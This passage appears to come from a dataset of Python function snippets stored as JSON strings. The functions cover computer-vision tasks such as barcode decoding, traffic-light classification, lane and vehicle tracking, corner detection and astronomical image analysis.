cv2.putText(image, tl_color, (box[1], box[0]), font, 2.0, font_color, lineType=cv2.LINE_AA)\n return image, tl_index", "def describe(image):\n needle = cv2.imread(image, 0)\n orb = cv2.ORB()\n keypoints, description = orb.detectAndCompute(needle, None)\n print(keypoints)\n print(description)\n return keypoints, description", "def main():\n stats = []\n start = timer()\n\n for file_name in get_dataset():\n\n # load image and ground truth detection mask\n img = cv2.imread(settings.PATH + file_name)\n ground_truth_mask = cv2.imread(settings.PATH_GT_MASKS + file_name)\n\n # Find list of barcode regions (rotated rectangle) within image\n barcode_regions, debug_img = find_barcodes(img)\n barcode_regions_mask = np.zeros(img.shape, np.uint8)\n barcode_images = None\n result = []\n\n # Decode barcode regions\n for barcode_region in barcode_regions:\n\n # Decode barcode image\n barcode_img = barcode_region.extract_from(img)\n barcode_mask = barcode_region.get_mask(img)\n debug_img = barcode_region.draw(debug_img)\n\n # Combine masks from multiple detected regions\n barcode_regions_mask += barcode_mask\n\n # Decode barcode\n decoded = pyzbar.decode(barcode_img)\n\n # Keep result for logging\n data = \", \".join([d.data.decode(\"utf-8\") for d in decoded])\n result.append({\"data\": data, \"region\": barcode_region.json()})\n\n if settings.SHOW_IMAGE:\n barcode_images = img_concat(barcode_images, barcode_img)\n\n # Jaccard_accuracy = intersection over union of the two binary masks\n jaccard_accuracy = 0\n if ground_truth_mask is not None:\n r = barcode_regions_mask.max(axis=-1).astype(bool)\n u = ground_truth_mask.max(axis=-1).astype(bool)\n jaccard_accuracy = float((r & u).sum()) / (r | u).sum()\n stats.append(jaccard_accuracy)\n\n # Log result\n logger.info(\n \"Image processed\",\n file_name=file_name,\n jaccard_accuracy=jaccard_accuracy,\n success=jaccard_accuracy > 0.5,\n result=result,\n )\n\n # In debug mode show visualization of detection algorithm\n if settings.SHOW_IMAGE:\n\n # Add alpha channel\n debug_img = cv2.cvtColor(debug_img, cv2.COLOR_BGR2BGRA)\n if barcode_images is not None:\n barcode_images = cv2.cvtColor(barcode_images, cv2.COLOR_BGR2BGRA)\n\n # Overlay error mask\n # Pixel-wise difference between ground truth and detected barcodes\n if ground_truth_mask is not None:\n error_img = np.zeros(debug_img.shape, np.uint8)\n error_img[r & u] = np.array([0, 0, 0, 0], dtype=np.uint8)\n error_img[np.logical_xor(r, u)] = np.array(\n [0, 0, 255, 1], dtype=np.uint8\n )\n debug_img = cv2.addWeighted(debug_img, 1, error_img, 0.5, 0)\n\n # Append barcode pictures to the right\n debug_img = img_concat(debug_img, barcode_images, axis=1)\n\n # Show visualization\n cv2.namedWindow(\"img\", cv2.WINDOW_NORMAL)\n cv2.imshow(\"img\", debug_img)\n cv2.waitKey(0)\n\n # Calculate final stats\n end = timer()\n accuracy = np.array(stats).mean()\n successes = np.where(np.array(stats) > 0.5)[0]\n logger.info(\n \"Final stats\",\n accuracy=accuracy,\n detection_rate=float(len(successes)) / len(stats),\n fps=len(stats) / (end - start),\n )", "def draw_boxes_cars(img, vehicles_instance):\n\n for car_number in range(1, vehicles_instance.number_of_found_cars+1):\n # Find pixels with each car_number label value\n nonzero = (vehicles_instance.binary_map == car_number).nonzero()\n\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), 
np.max(nonzeroy)))\n\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0, 0, 255), 6)\n\n return img", "def __image_pipeline(self, img):\n \n ##### Lane finding pipeline #######\n resized = self.__resize_image(img)\n undistorted = self.__correct_distortion(resized)\n warped = self.__warp_image_to_biv(undistorted)\n thresholded = self.__threshold_image(warped)\n lines = self.__get_lane_lines(thresholded)\n lane_img = self.__draw_lane_lines(undistorted, thresholded, include_stats=True)\n\n\n ##### Vehicle Tracking pipeline #####\n\n hot_windows = self.windFinder.get_hot_windows(img)\n car_boxes, wrap_img = self.vTracker.image_pipeline(img, hot_windows,\n return_img=False) \n # img = cv2.addWeighted(img, 1, wrap_img, 0.5, 0)\n result = self.__draw_boxes(lane_img, car_boxes)\n\n return result", "def test_find_tfl_lights(image_path, json_path=None, fig_num=None):\n image = np.array(Image.open(image_path))\n if json_path is None:\n objects = None\n else:\n gt_data = json.load(open(json_path))\n what = ['traffic light']\n objects = [o for o in gt_data['objects'] if o['label'] in what]\n\n show_image_and_gt(image, objects, fig_num)\n\n red_x, red_y, green_x, green_y = find_tfl_lights(image)\n plt.plot(red_x, red_y, 'ro', color='r', markersize=3)\n plt.plot(green_x, green_y, 'ro', color='g', markersize=3)", "def check_central_star(all_images,x_star0,y_star0,all_titles,all_filt,Dx=100,Dy=50):\n index=0\n \n x_star = []\n y_star = []\n \n for image in all_images:\n x0=int(x_star0[index])\n y0=int(y_star0[index])\n \n old_x0=x0-(x0-Dx)\n old_y0=y0-(y0-Dy)\n \n sub_image=np.copy(image[y0-Dy:y0+Dy,x0-Dx:x0+Dx])\n NX=sub_image.shape[1]\n NY=sub_image.shape[0]\n \n profile_X=np.sum(sub_image,axis=0)\n profile_Y=np.sum(sub_image,axis=1)\n X_=np.arange(NX)\n Y_=np.arange(NY)\n \n profile_X_max=np.max(profile_X)*1.2\n profile_Y_max=np.max(profile_Y)*1.2\n \n avX,sigX=weighted_avg_and_std(X_,profile_X**4) ### better if weight squared\n avY,sigY=weighted_avg_and_std(Y_,profile_Y**4) ### really avoid plateau contribution\n #print index,'\\t',avX,avY,'\\t',sigX,sigY\n \n f, (ax1, ax2,ax3) = plt.subplots(1,3, figsize=(20,4))\n\n ax1.imshow(sub_image,origin='lower',vmin=0,vmax=10000,cmap='rainbow')\n ax1.plot([avX],[avY],'ko')\n ax1.grid(True)\n ax1.set_xlabel('X - pixel')\n ax1.set_ylabel('Y - pixel')\n \n ax2.plot(X_,profile_X,'r-',lw=2)\n ax2.plot([old_x0,old_x0],[0,profile_X_max],'y-',label='old',lw=2)\n ax2.plot([avX,avX],[0,profile_X_max],'b-',label='new',lw=2)\n \n \n ax2.grid(True)\n ax2.set_xlabel('X - pixel')\n ax2.legend(loc=1)\n \n ax3.plot(Y_,profile_Y,'r-',lw=2)\n ax3.plot([old_y0,old_y0],[0,profile_Y_max],'y-',label='old',lw=2)\n ax3.plot([avY,avY],[0,profile_Y_max],'b-',label='new',lw=2)\n \n ax3.grid(True)\n ax3.set_xlabel('Y - pixel')\n ax3.legend(loc=1)\n \n \n thetitle=\"{} : {} , {} \".format(index,all_titles[index],all_filt[index])\n f.suptitle(thetitle, fontsize=16)\n \n theX=x0-Dx+avX\n theY=y0-Dy+avY\n \n x_star.append(theX)\n y_star.append(theY)\n \n \n index+=1\n \n x_star=np.array(x_star)\n y_star=np.array(y_star)\n \n return x_star,y_star", "def histo_image(image, verbose=False):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n histo_global = cv2.equalizeHist(gray)\n\n _, histo = cv2.threshold(histo_global, thresh=250,\n maxval=255, type=cv2.THRESH_BINARY)\n\n if verbose:\n plt.imshow(histo, cmap='gray')\n plt.show()\n\n return histo", "def plot_HDres_histos_vs_z(\n df,\n nameout,\n threshold_var=\"class0\",\n threshold_list=[0.5, 0.7, 0.9],\n 
threshold_sign=\">\",\n):\n\n P = df[df[\"class0\"] > 0.5]\n Ias = df[df[\"target\"] == 0]\n\n TP = P[P[\"target\"] == 0]\n FP = P[P[\"target\"] != 0]\n\n sel_TP_dic = {}\n sel_FP_dic = {}\n for t in threshold_list:\n if threshold_sign == \">\":\n sel_TP_dic[t] = TP[TP[threshold_var] > t]\n sel_FP_dic[t] = FP[FP[threshold_var] > t]\n else:\n sel_TP_dic[t] = TP[TP[threshold_var] < t]\n sel_FP_dic[t] = FP[FP[threshold_var] < t]\n\n plt.clf()\n cm = CMAP\n fig = plt.figure(figsize=(14, 14))\n # gs = gridspec.GridSpec(4, 2, width_ratios=[3, 1], height_ratios=[2, 2, 1, 1])\n # gs.update(wspace=0.1, hspace=0.3)\n\n # # gridspec init\n # ax00 = plt.subplot(gs[0, 0]) # Hres Ia\n # ax10 = plt.subplot(gs[1, 0], sharex=ax00) # Hres CC\n # ax20 = plt.subplot(gs[2:, 0], sharex=ax00) # efficiency\n # ax01 = plt.subplot(gs[0, 1], sharey=ax00) # histo Ia\n # ax11 = plt.subplot(gs[1, 1], sharey=ax10) # histo CC\n # ax21 = plt.subplot(gs[2, 1]) # histo x1\n # ax31 = plt.subplot(gs[3, 1]) # histo c\n gs = gridspec.GridSpec(3, 3, height_ratios=[2, 2, 1])\n # gs.update(wspace=0.2, hspace=0.1)\n\n # gridspec init\n ax00 = plt.subplot(gs[0, 0:2]) # Hres Ia\n ax10 = plt.subplot(gs[1, 0:2], sharex=ax00) # Hres CC\n ax20 = plt.subplot(gs[2, 0]) # redshift dist\n ax01 = plt.subplot(gs[0, 2], sharey=ax00) # histo Ia\n ax11 = plt.subplot(gs[1, 2], sharey=ax10) # histo CC\n ax21 = plt.subplot(gs[2, 1]) # histo x1\n ax31 = plt.subplot(gs[2, 2]) # histo c\n\n # lines\n ax00.plot([0, 1.2], np.zeros(len([0, 1.2])), \"k:\")\n ax10.plot([0, 1.2], np.zeros(len([0, 1.2])), \"k:\")\n\n mubins = np.arange(-2, 2 + 0.1, 0.1)\n\n # Hres w. histogram\n def HRwhisto(\n df, sel_dic, ax_left, ax_right, threshold_sign, ylabel=\"TP\", visible=False\n ):\n if ylabel == \"TP\":\n sntyp = \"Ia\"\n else:\n sntyp = \"CC\"\n ax_left.scatter(\n df[\"SIM_REDSHIFT_CMB\"],\n df[\"delmu\"],\n c=df[\"class0\"],\n cmap=CMAP,\n vmin=0.5,\n vmax=1,\n s=8,\n )\n ax_left.errorbar(\n df[\"SIM_REDSHIFT_CMB\"],\n df[\"delmu\"],\n yerr=df[\"delmu_err\"],\n color=\"gray\",\n zorder=0,\n fmt=\"none\",\n marker=\"none\",\n )\n\n ax_left.set_ylim(-2, 2)\n ax_left.set_xlim(0, 1.2)\n ax_left.set_ylabel(f\"{ylabel} residual\", fontsize=18)\n ax_left.tick_params(labelsize=14)\n plt.setp(ax_left.get_xticklabels(), visible=visible)\n if visible is True:\n ax_left.set_xlabel(\"simulated redshift\", fontsize=18)\n for t in threshold_list:\n sel = sel_dic[t]\n n_SNe = len(sel)\n ax_right.hist(\n sel[\"delmu\"],\n orientation=\"horizontal\",\n histtype=\"step\",\n color=cm(t),\n bins=mubins,\n density=True,\n label=f\"{n_SNe} {sntyp} {threshold_sign} {t}\",\n lw=2,\n )\n ax_right.legend(loc=\"lower center\", prop={\"size\": 13})\n plt.setp(ax_right.get_yticklabels(), visible=False)\n plt.setp(ax_right.get_xticklabels(), visible=False)\n ax_right.plot(\n [ax_right.get_xlim()[0], ax_right.get_xlim()[1]],\n np.zeros(len([ax_right.get_xlim()[0], ax_right.get_xlim()[1]])),\n \"k:\",\n )\n\n HRwhisto(TP, sel_TP_dic, ax00, ax01, threshold_sign, ylabel=\"TP\", visible=False)\n HRwhisto(FP, sel_FP_dic, ax10, ax11, threshold_sign, ylabel=\"FP\", visible=True)\n\n # z histos\n n, bins_to_use, tmp = ax20.hist(\n Ias[\"SIM_REDSHIFT_CMB\"], histtype=\"step\", color=\"black\", bins=15, lw=3\n )\n\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n sel_FP = sel_FP_dic[t]\n ax20.hist(\n sel_TP[\"SIM_REDSHIFT_CMB\"], histtype=\"step\", color=cm(t), bins=bins_to_use\n )\n ax20.hist(\n sel_FP[\"SIM_REDSHIFT_CMB\"],\n histtype=\"step\",\n color=cm(t),\n linestyle=\"--\",\n 
bins=bins_to_use,\n )\n ax20.set_xlim(0, 1.2)\n ax20.tick_params(labelsize=14)\n ax20.set_xlabel(\"simulated redshift\", fontsize=18)\n\n # hist stretch\n n, bins_to_use, tmp = ax21.hist(Ias[\"x1\"], color=\"black\", histtype=\"step\", lw=3)\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n ax21.hist(\n sel_TP[\"x1\"],\n orientation=\"vertical\",\n histtype=\"step\",\n color=cm(t),\n bins=bins_to_use,\n lw=2,\n )\n ax21.set_xlabel(\"x1\", fontsize=18)\n ax21.yaxis.set_label_position(\"right\")\n ax21.set_xlim(-3, 3)\n ax21.tick_params(labelsize=14)\n # color histo\n n, bins_to_use, tmp = ax31.hist(Ias[\"c\"], color=\"black\", histtype=\"step\", lw=3)\n for t in threshold_list:\n sel_TP = sel_TP_dic[t]\n ax31.hist(\n sel_TP[\"c\"],\n orientation=\"vertical\",\n histtype=\"step\",\n color=cm(t),\n bins=bins_to_use,\n lw=2,\n )\n ax31.set_xlabel(\"c\", fontsize=18)\n ax31.set_xlim(-1, 1)\n ax31.tick_params(labelsize=14)\n ax31.yaxis.set_label_position(\"right\")\n\n gs.tight_layout(fig)\n plt.savefig(nameout)\n plt.close()\n del fig", "def get_classification(self, image):\n hsv_image = cv2.cvtColor(image,cv2.COLOR_BGR2HSV)\n red_low = np.array([0, 100, 100],np.uint8)\n red_high = np.array([10, 255, 255],np.uint8) \n red1_low = np.array([160, 100, 100],np.uint8)\n red1_high = np.array([179, 255, 255],np.uint8)\n \n if cv2.countNonZero(cv2.inRange(hsv_image,red_low,red_high))+cv2.countNonZero(cv2.inRange(hsv_image,red1_low,red1_high))>45:\n return TrafficLight.RED\n \n yel_low = np.array([28, 100, 100],np.uint8)\n yel_high = np.array([48, 255, 255],np.uint8)\n if cv2.countNonZero(cv2.inRange(hsv_image, yel_low, yel_high)) > 45:\n return TrafficLight.YELLOW\n \n gr_low = np.array([64, 100, 100],np.uint8)\n gr_high = np.array([100, 255, 255],np.uint8)\n if cv2.countNonZero(cv2.inRange(hsv_image, gr_low, gr_high)) > 45:\n return TrafficLight.GREEN\n \n return TrafficLight.UNKNOWN", "def detect(self, img: np.ndarray) -> np.ndarray:\n filtered = self.filter(img)\n\n # Detect edges\n edges = cv2.Canny(np.uint8(filtered * 255), self.canny_lo, self.canny_hi)\n\n # Obtain the gradients for filtering.\n # We only require local gradients, so obtaining them only when required would make sense.\n dx = cv2.Scharr(filtered, cv2.CV_32F, 1, 0)\n dy = cv2.Scharr(filtered, cv2.CV_32F, 0, 1)\n\n # Now the stroke width transform already detects lo-hi-lo edges for us, but it is an extremely slow\n # implementation I did.\n if self._stroke_filter:\n gradients = (dx, dy)\n for y in range(0, edges.shape[0]):\n for x in range(0, edges.shape[1]):\n if edges[y, x] == 0:\n continue\n ray = swt_process_pixel((x, y), edges, gradients, min_length=5, max_length=20)\n if ray is None:\n edges[y, x] = 0\n else:\n edges = non_line_suppression(filtered, edges, dx, dy)\n\n if self._morphological_filtering:\n edges = cv2.morphologyEx(edges, cv2.MORPH_BLACKHAT, np.ones(shape=(5, 5)))\n edges = cv2.medianBlur(edges, 3)\n\n if self.detect_lines:\n lines = cv2.HoughLinesP(edges, 1, np.pi / 90, self.hough_line_support,\n minLineLength=self.hough_line_length, maxLineGap=self.hough_line_gap)\n edge_lines = np.zeros_like(edges)\n if lines is None:\n return edge_lines\n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(edge_lines, (x1, y1), (x2, y2), 255, 2)\n else:\n edge_lines = edges\n\n return edge_lines", "def harris_corner_detector(img, image_name):\n x_len = img.shape[0]\n y_len = img.shape[1]\n\n horizontal_sobel_filter = np.array([[1, 2, 1],\n [0, 0, 0],\n [-1, -2, -1]])\n\n vertical_sobel_filter = np.array([[-1, 0, 1],\n 
[-2, 0, 2],\n [-1, 0, 1]])\n\n # Compute edge strength of pixels in image\n gx = MyConvolve(img, horizontal_sobel_filter) \n gy = MyConvolve(img, vertical_sobel_filter)\n\n # Compute product of derivatives\n I_xx = gx * gx\n I_xy = gx * gy\n I_yy = gy * gy\n\n # Define Gaussian kernel\n kernel = gauss_kernels(3)\n \n # Convolve product of derivatives (I_xx, I_xy, I_yy)\n W_xx = MyConvolve(I_xx, kernel)\n W_xy = MyConvolve(I_xy, kernel)\n W_yy = MyConvolve(I_yy, kernel)\n\n # Initialise response matrix\n response = np.zeros(img.shape)\n\n # Compute response for pixels that will be taken into consideration\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n w = np.array([[W_xx[x, y], W_xy[x, y]],\n [W_xy[x, y], W_yy[x, y]]])\n det_W = np.linalg.det(w)\n trace_W = np.trace(w)\n response[x, y] = det_W - 0.06 * trace_W * trace_W\n\n # Get max response from response matrix \n max_r = np.max(response) \n\n # Initialise lists for x, y coordinates\n x_list = []\n y_list = []\n\n # Select response values within 10% of maximum response\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n if response[x, y] >= (max_r * 0.1) and response[x, y] <= (max_r * 1.9):\n x_list.append(x)\n y_list.append(y)\n\n # Plot selected response values on image\n plt.figure()\n plt.imshow(img, cmap='gray')\n plt.scatter(y_list, x_list, edgecolors='blue', facecolors='none', s=81, marker='s')\n plt.savefig(image_name + '_corners.jpg')", "def explore_data():\n labels = [\"vehicles\", \"non-vehicles\"]\n labelmap = {0: \"vehicles\", 1: \"non-vehicles\"}\n vehicles_glob = os.path.join(data_dir, \"vehicles\", \"**\", \"*.png\")\n nonvehicles_glob = os.path.join(data_dir, \"non-vehicles\", \"**\", \"*.png\")\n class_fnames = [\n glob.glob(vehicles_glob, recursive = True),\n glob.glob(nonvehicles_glob, recursive = True)]\n n_samples = [len(fnames) for fnames in class_fnames]\n shapes = []\n samples = []\n print(table_format([\"label\", \"size\", \"shape\"], header = True))\n for label, fnames in enumerate(class_fnames):\n indices = np.random.choice(len(fnames), 4*10, replace = False)\n for i in indices:\n fname = fnames[i]\n img = cv2.imread(fname)\n samples.append(img)\n shape = img.shape\n shapes.append(shape)\n print(table_format([labels[label], n_samples[label], shapes[label]]))\n\n samples = np.stack(samples)\n samples = tile(samples, 2*4, 10)\n cv2.imwrite(os.path.join(out_dir, \"datasamples.png\"), samples)\n\n return class_fnames, labelmap", "def cartoonise(picture_name):\n raw_img = picture_name\n out_img = './result/silhouetters_0.jpg'\n num_down = 2 # Reduce the number of pixel samples\n num_bilateral = 7 # Define the number of bilateral filters\n img_rgb = cv2.imread(raw_img) # read img\n # Lower sampling with gaussian pyramid\n img_color = img_rgb\n for _ in range(num_down):\n img_color = cv2.pyrDown(img_color)\n # Replace a large filter with a small bilateral filter\n for _ in range(num_bilateral):\n img_color = cv2.bilateralFilter(\n img_color, d=9, sigmaColor=9, sigmaSpace=7)\n # Lift sampled image to original size\n for _ in range(num_down):\n img_color = cv2.pyrUp(img_color)\n # Convert to grayscale and give it a medium blur\n img_gray = cv2.cvtColor(img_rgb, cv2.COLOR_RGB2GRAY)\n img_blur = cv2.medianBlur(img_gray, 7)\n # Detect edges and enhance them\n img_edge = cv2.adaptiveThreshold(img_blur, 255,\n cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY,\n blockSize=9,\n C=2)\n # Convert back to color image\n img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\n img_cartoon = 
cv2.bitwise_and(img_color, img_edge)\n # Save the converted image\n cv2.imwrite(out_img, img_cartoon)", "def scan_images(images, clf, first_index, vstep=15, hstep=15, dnum=5):\n detections = []\n for i in tqdm(range(len(images))):\n labels = find_faces(util.img_as_float(rgb2gray(images[i])), clf, first_index + i,\n vstep, hstep, dnum)\n for label in labels:\n detections.append(label)\n return np.array(detections)", "def locate_tracker(self, debug):\n\n # tmp_image =\n # tmp_image = cv2.GaussianBlur(self.frame, (11, 11), 0) # Experiment with this\n\n hsv = cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV) # Convert to HSV Color Space. This is temporary for testing using colored objects)\n\n mask = cv2.inRange(hsv, self.hueLower, self.hueUpper)\n\n try:\n mask = cv2.inRange(hsv, self.hueLower2, self.hueUpper2) + mask\n except AttributeError:\n pass\n\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n if debug:\n tmpMask = imutils.resize(mask, width=1000, height=1000)\n cv2.imshow(\"mask\", tmpMask)\n\n\n # find contours in the mask and initialize the current (x, y) center of the object\n cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]\n center = None\n\n # only proceed if at least one contour was found\n if len(cnts) > 0:\n # find the largest contour in the mask, then use\n # it to compute the minimum enclosing circle and\n # centroid\n c = max(cnts, key=cv2.contourArea)\n\n ((x, y), radius) = cv2.minEnclosingCircle(c)\n M = cv2.moments(c)\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n # only proceed if the radius meets a minimum size\n # if radius > 10:\n # # draw the circle and centroid on the frame,\n # # then update the list of tracked points\n # cv2.circle(frame, (int(x), int(y)), int(radius),\n # (0, 255, 255), 2)\n # cv2.circle(frame, center, 5, (0, 0, 255), -1)\n if debug:\n cv2.drawContours(self.frame, c, -1, (0, 255, 0), 20)\n return center, radius\n # update the points queue\n cv2.imshow(\"mask\", imutils.resize(mask, width=1000, height=1000))\n cv2.imshow(\"frame\", imutils.resize(self.frame, width=1000, height=1000))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n raise OpenCVError(\"Could not find tracker!\")\n\n # return (1, 1), 1", "def belt(image):\n\n # Belt Detector\n x, y = circular_detector(image, 70, 80)\n\n return x, y", "def filter_images(self, images):\n status = self.day_or_night(images[0][1],\n self.gray_refs['day'][0],\n self.gray_refs['night'][0])\n print status\n exclusions = self.gray_refs[status]\n threshold = 0.7\n last_ref = None\n result = []\n\n for filename, gray_img, raw_img in images:\n skip = False\n if last_ref:\n dist = ssim(gray_img, exclusions[last_ref], multichannel=False)\n if dist > threshold:\n skip = True\n\n if not skip:\n for i, gray_ref in enumerate(exclusions):\n if i == last_ref:\n continue\n dist = ssim(gray_img, gray_ref, multichannel=False)\n if dist > threshold:\n skip = True\n last_ref = i\n break\n\n if not skip:\n if (time.time() - self.last_notify) > notify_thresh:\n send_alert('Alert! 
Motion detected near front door.')\n self.last_notify = time.time()\n result.append((filename, gray_img, raw_img))\n return result", "def detectState(self, colorImage):\n\n self.image = colorImage;\n self.video = Video()\n\n # find the intersections of the hough lines\n self.intersects = self._findIntersects()\n\n # Use previoulsy acquired data to create a board, that is, a dictionary of cells [Cell Class]\n self._divideInCells()\n\n return self.board, self.image", "def detect_and_draw_as_marker(self, image):\r\n # Required variables\r\n count = 0\r\n # convert to HSV.. so that we can filter out the image from our captured HSV values for our markers previously..\r\n HSVimg = cv2.cvtColor(src=image, code=cv2.COLOR_BGR2HSV)\r\n # loop through all marker's HSV values\r\n for marker_HSV in self.markers_HSV:\r\n lower_boundary = np.array(marker_HSV[0])\r\n upper_boundary = np.array(marker_HSV[1])\r\n # Get the mask image that satisfies the lower and upper HSV values..\r\n maskImg = cv2.inRange(src=HSVimg, lowerb=lower_boundary, upperb=upper_boundary)\r\n\r\n '''Draw the contours for the mask image detected, marker point for the marker'''\r\n # Get the bounding box corners (In the function call to self.draw_contours(), contours are drawn to original camera feed, if self.debug_mode is set to 1)\r\n x, y, width, height = self.draw_contours(image, maskImg)\r\n if self.debug_mode:\r\n cv2.rectangle(img=image, pt1=(x, y), pt2=(x + width, y + height), color=(255, 0, 255), thickness=3)\r\n # Select the marker point..\r\n marker_point_center = (x + width // 2, y)\r\n # Draw the marker point..\r\n # cv2.circle(img=image, center=marker_point_center, radius=5, color=(2, 255, 10), thickness=cv2.FILLED)\r\n cv2.circle(img=image, center=marker_point_center, radius=5, color=list(self.marker_colors[count]), thickness=cv2.FILLED)\r\n\r\n # Append the trace point of marker..\r\n self.marker_path_points.append([marker_point_center, count])\r\n #print(count, end=\"\\n\")\r\n count += 1", "def detect(frame: numpy.ndarray) -> bool:\n color = frame[:20, 1100:1150].mean(axis=(0, 1))\n return numpy.linalg.norm(color - BG_COLOR) < 5", "def get_centers(file_path = \"./data/input.jpeg\", n_rows=10, n_cols=10, verbose=False, image_thresh=20, hough_thresh=20, minDist=20, maxRadius=20):\n print(\"looking for circles in the image\")\n cimg = cv2.imread(file_path, 1)\n gimg = cv2.cvtColor(cimg, cv2.COLOR_BGR2GRAY)\n gimg = cv2.medianBlur(gimg, 5)\n # threshold the image for better circle finding\n _, gimg = cv2.threshold(gimg, image_thresh, 255, cv2.THRESH_BINARY)\n\n\n # find circles on the image\n circles = cv2.HoughCircles(gimg, cv2.HOUGH_GRADIENT, dp=1, minDist=minDist, param1=1, param2=hough_thresh, minRadius=5,\n maxRadius=maxRadius)\n\n # re-sequence the circles found\n circles = circles[0, :, :].reshape((-1, 3))\n x_min = circles.min(axis=0)[0]\n x_max = circles.max(axis=0)[0]\n avg_spacing = (x_max - x_min) / (n_cols - 1)\n x_segment = [x_min - avg_spacing / 2 + avg_spacing * i for i in range(11)]\n def get_col_id(point):\n # return which col this point sits\n x = point[0]\n for i in range(n_cols):\n if x_segment[i] < x < x_segment[i + 1]:\n return i\n cols = [[] for i in range(n_cols)]\n for circle in circles:\n id = get_col_id(circle)\n cols[get_col_id(circle)].append(circle)\n for i, col in enumerate(cols):\n cols[i] = list(sorted(col, key=lambda p:p[1]))\n grid = np.zeros((n_rows, n_cols, 3))\n for c in range(n_cols):\n for r in range(n_rows):\n grid[r, c, :] = cols[c][r]\n\n # plot theses circles to make sure the 
sequence is correct\n gaussian_img = cv2.GaussianBlur(cv2.cvtColor(cimg, cv2.COLOR_BGR2GRAY), (5, 5), 0)\n for c in range(10):\n for r in range(10):\n pos = grid[r, c, :2].astype(np.int)\n radius = grid[r, c, 2].astype(np.int)\n # draw the outer circle\n cv2.circle(cimg, (pos[0], pos[1]), radius, (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimg, (pos[0], pos[1]), 2, (0, 0, 255), 3)\n # find the avg intensity at each center\n grid[r, c, 2] = gaussian_img[pos[1], pos[0]]\n if verbose:\n cv2.imshow('circles found in the image', cimg)\n cv2.waitKey(10)\n\n if verbose:\n cv2.imshow('circles found in the image', cimg)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return grid", "def guess_image(which_cam, image, ntraps):\n threshes = [0.5, 0.65]\n ## Image Conditioning ##\n margin = 10\n threshold = np.max(image)*threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif p < threshold and left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n xdata = np.arange(x_len)\n plt.figure()\n plt.plot(xdata, peak_vals)\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)", "def detectBall():\n\t\n\tglobal np_arr\n\timage_np = cv2.imdecode(np_arr, cv2.IMREAD_COLOR) # OpenCV >= 3.0:\n\n\tblackLower = (0, 0, 0) \n\tblackUpper = (5,50,50)\n\tredLower = (0, 50, 50)\n\tredUpper = (5, 255, 255)\n\tyellowLower = (25, 50, 50) \n\tyellowUpper = (35, 255, 255)\n\tgreenLower = (50, 50, 50) \n\tgreenUpper = (70, 255, 255)\n\tblueLower = (100, 50, 50) \n\tblueUpper = (130, 255, 255)\n\tmagentaLower = (125, 50, 50) \n\tmagentaUpper = (150, 255, 255)\n\n blurred = cv2.GaussianBlur(image_np, (11, 11), 0)\n hsv = cv2.cvtColor(blurred, cv2.COLOR_BGR2HSV)\n\n\tmask_blk = cv2.inRange(hsv, blackLower, blackUpper)\n mask_blk = cv2.erode(mask_blk, None, iterations=2)\n mask_blk = cv2.dilate(mask_blk, None, iterations=2)\n\n\tmask_r = cv2.inRange(hsv, redLower, redUpper)\n mask_r = cv2.erode(mask_r, None, iterations=2)\n mask_r = cv2.dilate(mask_r, None, iterations=2)\n\n\tmask_y = cv2.inRange(hsv, yellowLower, yellowUpper)\n mask_y = cv2.erode(mask_y, None, iterations=2)\n mask_y = cv2.dilate(mask_y, None, iterations=2)\n\n\tmask_g = cv2.inRange(hsv, greenLower, greenUpper)\n mask_g = cv2.erode(mask_g, None, iterations=2)\n mask_g = cv2.dilate(mask_g, None, iterations=2)\n\n mask_blu = cv2.inRange(hsv, blueLower, blueUpper)\n mask_blu = cv2.erode(mask_blu, None, iterations=2)\n mask_blu = cv2.dilate(mask_blu, None, iterations=2)\n\n\tmask_m = cv2.inRange(hsv, 
